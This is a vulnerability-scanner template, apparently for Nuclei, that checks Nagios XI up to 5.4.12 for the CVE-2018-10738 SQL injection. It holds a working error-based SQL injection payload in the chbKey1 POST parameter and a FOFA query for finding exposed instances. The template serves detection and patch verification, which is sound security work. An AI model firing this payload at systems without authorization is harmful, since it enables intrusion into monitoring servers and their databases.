44 lines
1.5 KiB
YAML
44 lines
1.5 KiB
YAML
id: CVE-2018-10738
|
|
|
|
info:
|
|
name: NagiosXI <= 5.4.12 menuaccess.php - SQL injection
|
|
author: DhiyaneshDk
|
|
severity: high
|
|
description: |
|
|
A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/menuaccess.php chbKey1 parameter.
|
|
reference:
|
|
- https://qkl.seebug.org/vuldb/ssvid-97268
|
|
- https://vuldb.com/de/?id.117807
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 7.2
|
|
cve-id: CVE-2018-10738
|
|
cwe-id: CWE-89
|
|
epss-score: 0.00403
|
|
epss-percentile: 0.7323
|
|
cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: nagios
|
|
product: nagios_xi
|
|
fofa-query: app="Nagios-XI"
|
|
tags: cve,cve2018,nagios,sqli
|
|
|
|
variables:
|
|
num: "{{rand_int(2000000000, 2100000000)}}"
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/nagiosql/admin/menuaccess.php"
|
|
headers:
|
|
Content-Type: application/x-www-form-urlencoded
|
|
body: "selSubMenu=1&subSave=1&chbKey1=-1%' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#"
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "{{md5(num)}}"
|
|
# digest: 490a0046304402202285ef8eb065ed205938c23f3c003cc2d946d8ab8a6c8c1bd97862cebffd6db60220284522e629f3ac4055349fd664d75a2645f27c19f847da1cb7aa77df38fd73b8:922c64590222798bb761d5b6d8e72950 |